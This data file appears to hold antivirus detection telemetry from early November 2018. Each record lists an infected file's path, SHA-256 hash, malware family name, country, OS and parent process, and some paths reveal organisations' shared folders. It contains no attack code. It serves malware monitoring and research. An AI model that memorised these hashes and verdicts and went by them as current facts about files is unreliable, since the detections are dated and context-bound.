  Row(detection=Row(filename='avscan-20181102-055759-39175eb2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055759-39175EB2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060117-aeed2e96', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060117-AEED2E96', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055437-c08df267', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055437-C08DF267', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052018-f551dd30', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052018-F551DD30', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055744-2fd05868', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055744-2FD05868', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='df5f7e0182e1719ab5ef18eb7bf9522d_1e4d3a93.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-02_20-58-22\\df5f7e0182e1719ab5ef18eb7bf9522d_1e4d3a93.exe', filesize=2496000, name='HEUR/AGEN.1007445.#M1.#R1'), hash='8a0ba8074f6d157cac3a04b807bbdbe6b8cfb2e6b109d7c90b71523d52e9537e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe70_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe70 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-02T20:08:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052545-b8541f43', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052545-B8541F43', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050907-657871b8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050907-657871B8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054844-ee0fbef2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054844-EE0FBEF2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T11:23:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050831-4fd518ca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050831-4FD518CA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='manageddbgca.exe', filepath='C:\\Program Files (x86)\\Microsoft Visual Studio .NET 2003\\Common7\\Packages\\Debugger\\ManagedDbgCA.exe', filesize=156000, name='W32/Ramnit.C.#M1.#R1'), hash='798b7aa17181333e392455514882f86643138eab5dd0b434acb911a1d0de3576', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T04:35:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T19:52:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051233-e0160a2a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051233-E0160A2A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053407-e366fdf7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053407-E366FDF7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050821-49a3c88f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050821-49A3C88F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054442-5dd92a86', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054442-5DD92A86', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055428-bb335e55', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055428-BB335E55', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051223-d9eda8ee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051223-D9EDA8EE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051143-c2493cb2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051143-C2493CB2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060918-cde0fd34', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060918-CDE0FD34', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053450-fd254b6b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053450-FD254B6B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062423-e8f78520', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062423-E8F78520', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050650-13dfd8f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050650-13DFD8F2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='downloadtool.exe', filepath='\\\\?\\H:\\New folder\\CABLE PROJECT M10F Paid for_with_ph_no\\M10F_OpenCPU_GS4_SDK_V1.2\\downtools\\QFlash_V3.3\\QFlash_V3.3\\INT\\CH1\\DownloadTool.exe', filesize=1664000, name='W32/Neshta.A.#M1.#R1'), hash='3a234e56b0f515a8ce4c3c83a5ce9f8b24a535d8ca498ed4c3021105b7225ae3', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:53:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='training 2017.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2017\\RPG GARMENT 2017\\LPA 2017\\NOTULEN TRAINING 2017\\TRAINING 2017.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hubungan industrial 2015 rpg.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\new\\MATERI HUBUNGAN INDUSTRIAL 2015 RPG\\HUBUNGAN INDUSTRIAL 2015 RPG.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T22:24:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xerces-c_1_6_0.dll', filepath='D:\\哩哩扣扣\\3D MAX 2009\\xerces-c_1_6_0.dll', filesize=1536000, name='W32/Ramnit.CD.#M1.#R1'), hash='4d30ab0a2caee087440941a0226135c98a9c8e65125a9c3f70e898e68f6fc107', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1378648, timestamp='2018-11-01T12:40:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154733-6c53e9e7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154733-6C53E9E7', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:47:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155025-8954736a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155025-8954736A', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:50:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-00-43-28.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T23:23:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='024c5fcb367b3543dd2fb0080a9504da124fb24f29874a3e914310867a02f9b9', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\024C5FCB367B3543DD2FB0080A9504DA124FB24F29874A3E914310867A02F9B9', filesize=320000, name='TR/Patched.Gen.#M300.#R6433'), hash='024c5fcb367b3543dd2fb0080a9504da124fb24f29874a3e914310867a02f9b9', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:00:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_farngei.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{06332CB9-78B5-49D8-A9B1-18CF5E84F1B7}\\E_FARNGEI.EXE', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='14e1d424c84cb2c830a181196637b8888a1110e2928e3fa9e5b07f8c96931ff2', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T00:59:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nov0414.pif', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\Borong\\SORE\\NOV0414\\NOV0414.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='training.exe', filepath='D:\\DATA_SHARE\\BU DWI\\Training\\Training.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:21:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155517-ba860f87', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155517-BA860F87', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:55:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160337-0eadfa48', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160337-0EADFA48', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:03:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='copy of kerusakan c-2a.xls', filepath='\\\\sango04\\rheology\\INA\\Copy of KERUSAKAN C-2a.xls', filesize=1408000, name='X2000M/Laroux.B.#M1.#R1'), hash='2f5f15749752e7dc7ed01e76fca7f94606b19046c89897b234a063fd7b2b21dd', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1821808, timestamp='2018-11-01T07:26:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='422017c0fdb0430ba03351d989984745b7f66a3097ef0a59ca28191ec5375b51', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\422017C0FDB0430BA03351D989984745B7F66A3097EF0A59CA28191EC5375B51', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='422017c0fdb0430ba03351d989984745b7f66a3097ef0a59ca28191ec5375b51', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:51:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T02:45:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aapt.exe', filepath='F:\\FILES 1\\Micromax_D320\\Micromax_D320_V2_14.08.15_(by_xdafirmware.com)\\Micromax_D320_V2_14.08.15\\SN Write Tool v2.1444.00\\Android\\aapt.exe', filesize=2048000, name='W32/Sality.AT.#M1.#R1'), hash='371da97f1866bcdca21390e6247ecbd44a1114dab1606971060c12180bb24140', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-01T10:31:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh376a.exe', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH376A.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:29:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:51:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190955-22246c9a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190219-D4548F48\\AVSCAN-20181101-190955-22246C9A', filesize=64000, name='TR/Siggen.64000.2.#M1.#R1'), hash='33e25a0a50e61900ef969fe4a406e8d89dec25d5081b0403b61e97927c18403d', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:09:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160008-eb7f16e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160008-EB7F16E6', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:00:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0f61e29ed2b68b45499e17c371179d8561416db85b9312ebd86b6a5f962004a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\A0F61E29ED2B68B45499E17C371179D8561416DB85B9312EBD86B6A5F962004A', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a0f61e29ed2b68b45499e17c371179d8561416db85b9312ebd86b6a5f962004a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:54:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-055219-3fb65f96', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a0714c40\\AVSCAN-20181101-055040-315926D0\\AVSCAN-20181101-055219-3FB65F96', filesize=192000, name='TR/Dropper.Gen.#M1.#R1'), hash='a5d484184ac1e495dd72cc2cffab595c03ec483e95423b36b66d82e151c95b2b', metadata=Row(cmdline=None, country='ZA', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T03:52:19Z'), dt=datetime.date(2018, 11, 1)),
